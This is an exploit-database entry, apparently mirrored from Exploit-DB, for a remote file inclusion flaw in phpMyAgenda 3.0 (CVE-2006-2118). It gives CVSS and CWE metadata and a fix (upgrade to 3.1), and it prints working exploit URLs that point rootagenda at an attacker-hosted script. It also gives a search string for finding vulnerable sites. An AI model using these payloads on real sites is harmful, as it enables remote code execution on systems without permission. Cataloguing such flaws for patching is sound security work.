header-logo
Suggest Exploit
vendor:
phpMyAgenda
by:
Aesthetico
8,3
CVSS
HIGH
Remote File Include Vulnerability
94
CWE
Product Name: phpMyAgenda
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: YES
Related CWE: CVE-2006-2118
CPE: a:phpmyagenda:phpmyagenda:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

phpMyAgenda <=3.0 Final - Remote File Include Vulnerability

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?

Mitigation:

Upgrade to version 3.1 or later
Source

Exploit-DB raw data:

Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: phpMyAgenda
URL: http://phpmyagenda.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by phpMyAgenda"
-----------------------------------------------------------------

Exploitation:

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?

# milw0rm.com [2006-04-30]

Navigation

Suggest Exploit

Services By CQR